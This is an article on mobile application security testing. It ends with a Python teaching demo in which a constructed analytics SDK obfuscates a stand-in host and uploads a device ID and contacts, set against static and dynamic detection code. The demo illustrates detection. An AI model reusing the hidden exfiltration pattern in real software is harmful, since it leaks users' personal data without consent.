Every month, thousands of mobile applications are released, and the number of apps available on the stores is currently estimated at over 4 million. In a recent study, the Ponemon Institute found that 60% of IT security leaders reported a data breach caused by an insecure mobile app, while only 29% of mobile applications are being tested for vulnerabilities.
As a consequence, Gartner predicted in its latest Market Guide for Mobile Application Security Testing that by 2020, up to 90% of enterprises will test their mobile applications.
A MOBILE APPLICATION CAN HAVE TWO KINDS OF SECURITY HOLES
1. Unwanted / unexpected behaviors
Usually, such flaws come along with third-party libraries. Libraries are designed for specific services (payment, analytics, ...) and embedded into applications. As they come from external companies, developers have no control over their source code. Very often, these libraries silently perform actions unrelated to their stated purpose (such as connecting to unknown servers) and leak data.
2. Vulnerabilities
Whether it originates in the source code of the app itself or in an embedded library, a mobile app can carry one or several vulnerabilities. The OWASP community maintains the Mobile Top 10, a list of the most critical mobile risk categories, as part of its Mobile Security Project. Behind these ten categories lie hundreds of individual weaknesses that can make an app vulnerable to attack.
The various data protection regulations across the world (GDPR, PIPEDA, FTC Act, ...) require companies to take appropriate measures to protect the data they process. Whether they develop apps for their employees, partners or end users, companies must test the security level of the apps they release to prevent data leakage and security breaches. There are different solutions on the market to test mobile application security at any stage of the development cycle.
THE REQUIREMENTS A MAST (MOBILE APPLICATION SECURITY TESTING) TOOL MUST MEET
- SDLC integration & ready-to-use platform: Whether a company wants to test an app throughout its development cycle or once it has been developed, it is convenient to use a solution that allows both. Having the choice between a ready-to-use platform and an API that integrates into the SDLC (Software Development Life Cycle) offers more flexibility and adapts to a company's evolving needs.
- Customizable security levels: Because applications handle data of different sensitivity depending on the service they offer, they need to be tested accordingly. A testing solution that allows customizing security levels gives a precise answer to each application's security needs.
- One tool for every environment: Most of the time, applications have Android and iOS versions, and sometimes a Windows version as well. It is better to centralize the testing of all these apps with a single solution that supports every OS.
- Static and dynamic behavioral analyses: An application can look safe when only its code is inspected, yet perform suspicious actions once executed (for instance when a server address is assembled at runtime instead of being stored as a plain string). To get a complete assessment and to keep false positives to a minimum, both static and dynamic analyses have to be performed: static analysis finds what is visible in the code, dynamic analysis confirms what the app actually does when it runs.
- Vulnerability identification: In our last report, we identified that 25% of applications embedded one or more vulnerabilities, including very popular ones such as Uber (as shown in this Uber App analysis). Pointing them out during the testing process is required to reinforce security.
- Remediation: The remediation phase occurs once an app has been tested and its points of failure have been identified. More than just providing a list of vulnerabilities and suspicious behaviors, some solutions offer in-depth advice on how to remediate apps and even provide an automatic remediation procedure. Adopting a solution that delivers this service eases the corrective action process.
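To make the "static and dynamic behavioral analyses" requirement concrete, here is an added example; it is not code from the original page or from any vendor's product. It is a Python toy: a constructed "analytics SDK" decodes its upload host at runtime, a static scan of the compiled code's string constants finds nothing suspicious, and hooking the network sink while the code runs records both the destination and the data that left the device. The host name telemetry.example.net, the XOR key, the http_post stand-in and the sample contact list are all constructed for the illustration; on a real device the hook would be a Frida or Xposed instrument on the platform HTTP classes rather than a Python monkeypatch, and the static side would walk the string table of the dex or Mach-O binary.

```python
"""
Why static analysis alone is not enough: a constructed 'analytics SDK' decodes its
upload host at runtime, so a string-table scan of the compiled code sees nothing,
while hooking the network sink during execution records the real destination and
the data that left.  Everything here is a stand-in; no network I/O happens.
"""
from typing import Callable
from urllib.parse import urlparse

# ---- constructed sample "third-party library" (not a real SDK) ----------------

_KEY = 0x2A
# "telemetry.example.net" XOR 0x2A, precomputed so the clear-text host is never a constant
_OBFUSCATED_HOST = b"^OFOGO^XS\x04ORKGZFO\x04DO^"


def http_post(url: str, body: bytes) -> int:
    """Stand-in for the platform HTTP client.  Deliberately sends nothing."""
    return 200


def _decode_host() -> str:
    return "".join(chr(b ^ _KEY) for b in _OBFUSCATED_HOST)


def analytics_init(device_id: str, contacts: list[str]) -> None:
    """Advertised purpose: crash reporting.  Undisclosed side effect: uploads the
    address book to a host that only exists as a string at runtime."""
    url = f"https://{_decode_host()}/collect"
    http_post(url, f"{device_id}:{','.join(contacts)}".encode())


def legacy_analytics_init(device_id: str) -> None:
    """Older variant with the host as a plain literal: static scanning catches this one."""
    http_post("https://telemetry.example.net/collect", device_id.encode())


# ---- static check: scan the compiled code's string constants ------------------

SUSPICIOUS_HOSTS = {"telemetry.example.net"}  # constructed blocklist


def string_constants(func: Callable) -> set[str]:
    """Walk a function's constant pool, including nested code objects (comprehensions,
    lambdas), the way a dex/ELF string-table scan walks a binary."""
    out: set[str] = set()
    stack = [func.__code__]
    while stack:
        code = stack.pop()
        for c in code.co_consts:
            if isinstance(c, str):
                out.add(c)
            elif hasattr(c, "co_consts"):
                stack.append(c)
    return out


def static_scan(funcs: list[Callable]) -> set[str]:
    """Return every blocklisted host that appears inside any string constant."""
    strings = set().union(*(string_constants(f) for f in funcs))
    return {h for h in SUSPICIOUS_HOSTS if any(h in s for s in strings)}


# ---- dynamic check: hook the network sink, then run the code ------------------

def dynamic_scan(entry: Callable[[], None]) -> list[tuple[str, bytes]]:
    """Execute `entry` with http_post replaced by a recording wrapper (the Python
    analogue of a Frida/Xposed hook) and return every (host, body) observed.
    The original sink is restored afterwards, even if `entry` raises."""
    global http_post
    observed: list[tuple[str, bytes]] = []
    original = http_post

    def hooked(url: str, body: bytes) -> int:
        observed.append((urlparse(url).hostname or "", body))
        return original(url, body)

    http_post = hooked
    try:
        entry()
    finally:
        http_post = original
    return observed


if __name__ == "__main__":
    # The obfuscated SDK: static finds nothing, dynamic shows the contacts leaving.
    print("static :", static_scan([analytics_init, _decode_host]))
    print("dynamic:", dynamic_scan(lambda: analytics_init("dev-1", ["alice", "bob"])))
    # The legacy SDK with a literal host: both analyses agree.
    print("static :", static_scan([legacy_analytics_init]))
    print("dynamic:", dynamic_scan(lambda: legacy_analytics_init("dev-2")))
```

The two scans are complementary rather than redundant: the static pass is cheap and catches the literal host in the legacy variant, but it reports nothing for the obfuscated one, while the dynamic pass only sees code paths that actually execute, so coverage of the triggering entry points matters. Running both is what lets a finding be confirmed instead of merely suspected, which is where the reduction in false positives comes from.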